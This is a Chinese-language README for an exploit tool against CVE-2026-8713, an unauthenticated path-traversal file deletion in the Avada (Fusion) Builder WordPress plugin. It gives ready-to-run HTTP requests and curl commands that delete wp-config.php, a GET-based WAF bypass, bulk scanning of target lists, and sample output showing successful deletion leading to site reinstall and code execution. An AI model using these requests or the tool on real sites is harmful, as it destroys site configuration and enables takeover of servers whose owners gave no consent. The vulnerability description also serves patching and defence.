CVE-2026-8713 是 WordPress 的 Avada (Fusion) Builder 插件/主题中的一个 CVSS 9.1 严重漏洞。Fusion_Form_DB_Entries 类中的 maybe_delete_files() 函数使用简单的字符串替换,从攻击者控制的表单条目值构建文件系统路径——不经过 realpath() 验证或目录包含检查。
未经认证的攻击者通过 fusion_form_submit_ajax 处理器提交一个路径遍历负载。当 Fusion_Form_DB_Privacy 关闭钩子处理该条目(privacy_expiration_action=delete)时,目标文件会从服务器被删除。
| 版本 | 状态 |
|---|---|
| Fusion Builder ≤ 3.15.3 | 存在漏洞 |
| Fusion Builder ≥ 3.15.4 | 已修补 |
| Avada 主题(所有) | 捆绑的插件可能仍存在漏洞 |
注意: Avada 主题版本(7.x)与 Fusion Builder 插件版本(3.x)不同。漏洞位于插件中,但扫描器会检测两者。
在 fusion-builder/inc/class-fusion-form-db-entries.php 中,maybe_delete_files() 方法通过字符串替换解析文件路径,不进行包含验证:
$file_path = str_replace($upload['url'], $upload['path'], $value);
// 没有 realpath() 检查——路径遍历序列会直接通过
unlink($file_path);
1. 攻击者通过 wp_ajax_nopriv_fusion_form_submit_ajax 提交 Avada 表单
→ 路径遍历: ../../wp-config.php
→ privacy_expiration_action = delete
→ privacy_expiration_interval = 0
2. WordPress 关闭钩子触发 Fusion_Form_DB_Privacy
→ 处理存储的表单条目
→ 对攻击者控制的路径调用 maybe_delete_files()
→ wp-config.php 被删除
3. WordPress 进入设置/安装模式
→ 攻击者将站点连接到恶意数据库
→ 完全远程代码执行
AJAX 处理器注册了 wp_ajax_nopriv_,使得未认证用户也可以访问:
POST /wp-admin/admin-ajax.php
action=fusion_form_submit_ajax
form_id=<id>
privacy_expiration_action=delete
fusion_privacy_expiration_interval=0
fusion_form_field_<name>=../../wp-config.php
许多主机屏蔽了对 /wp-admin/admin-ajax.php 的 POST 请求。WordPress 在此端点上接受通过 GET 传递的参数,提供了一种简单的绕过方式:
GET /wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=<id>&privacy_expiration_action=delete&...
git clone https://github.com/shinthink/CVE-2026-8713.git
cd CVE-2026-8713
pip install -r requirements.txt
# 仅检测(默认——不删除文件)
python cve_2026_8713.py -t target.com
# 批量检测
python cve_2026_8713.py -f targets.txt
# 漏洞利用模式——删除 wp-config.php
python cve_2026_8713.py -t target.com --exploit
# 删除自定义文件
python cve_2026_8713.py -t target.com --exploit --delete "../../../debug.log"
-t, --target 单个目标(域名或 IP)
-f, --file 目标列表,每行一个
--exploit 启用文件删除(默认:仅检测)
--delete PATH 要删除的自定义文件路径(默认:wp-config.php)
-o, --output 将结果保存到文件
--threads 工作线程数(默认:20)
-v, --verbose 显示详细输出
$ python cve_2026_8713.py -f targets.txt
CVE-2026-8713 Avada (Fusion) Builder | CVSS 9.1
模式: 检测 | 目标数: 521 | 线程数: 20
───────────────────────────────────────────────────────
[利用] target-vuln.com 1.2s 表单 #3 (AJAX 可访问)
[漏洞] target-waf.com 2.1s 表单 #1 (WAF 已拦截)
[AVADA] target-noform.com 0.5s (未找到表单)
[-] target-noavada.com 0.3s
───────────────────────────────────────────────────────
扫描完成 | 耗时: 45s
───────────────────────────────────────────────────────
目标总数 : 521
检测到 Avada : 47
找到表单 : 12
存在漏洞 : 9
$ python cve_2026_8713.py -t target.com --exploit -v
CVE-2026-8713 — Avada Builder 漏洞利用
CVSS 9.1 | 未认证 | 路径遍历 → 文件删除 → 远程代码执行
[+] 发现 Avada 表单: id=3
[+] POST form_id=3: HTTP 403 (WAF 拦截)
[+] GET form_id=3: HTTP 200 (WAF 绕过)
主机 : target.com
Avada : 是
表单 : 3
已删除 : wp-config.php (强制重装 → 远程代码执行)
耗时 : 3.2s
步骤 1 — 验证 Avada
curl -sk 'https://target.com/wp-content/themes/Avada/style.css' | head -5
步骤 2 — 查找表单 ID
curl -sk 'https://target.com/' | grep -oP 'fusion-form[^"]*form-id=["\x27](https://github.com/shinthink/cve-2026-8713/blob/HEAD/%5Cd+)'
步骤 3 — 通过路径遍历提交表单
curl -sk -X POST \
-d 'action=fusion_form_submit_ajax' \
-d 'form_id=3' \
-d 'privacy_expiration_action=delete' \
-d 'fusion_privacy_expiration_interval=0' \
-d 'fusion_form_field_x=../../wp-config.php' \
'https://target.com/wp-admin/admin-ajax.php'
步骤 4 — WAF 绕过(如果 POST 被拦截)
curl -sk 'https://target.com/wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=3&privacy_expiration_action=delete&fusion_privacy_expiration_interval=0&fusion_form_field_x=../../wp-config.php'
步骤 5 — 验证并利用远程代码执行
# 站点进入安装模式?
curl -sk -o /dev/null -w '%{http_code}' 'https://target.com/wp-admin/install.php'
# HTTP 200 → wp-config 被删除 → 连接恶意数据库 → 完全远程代码执行
仅供教育和授权测试使用。
本软件适用于执行授权渗透测试的安全专业人员、审计自身基础设施的组织以及研究漏洞利用的研究人员。
未经授权访问计算机系统是非法的,可能违反:
- 美国:计算机欺诈和滥用法案(18 U.S.C. 1030)
- 印度尼西亚:UU ITE 第 30 条和第 46 条
- 欧盟:2013/40/EU 指令
- 英国:计算机滥用法案 1990
作者对滥用行为不承担任何责任。
本项目与 ThemeFusion 或 Avada 无关。
| 资源 | 链接 |
|---|
| IONIX 通告 | ionix.io/threat-center/cve-2026-8713 |
| Wordfence 通告 | wordfence.com |
| Patchstack | patchstack.com |
| NVD 条目 | CVE-2026-8713 |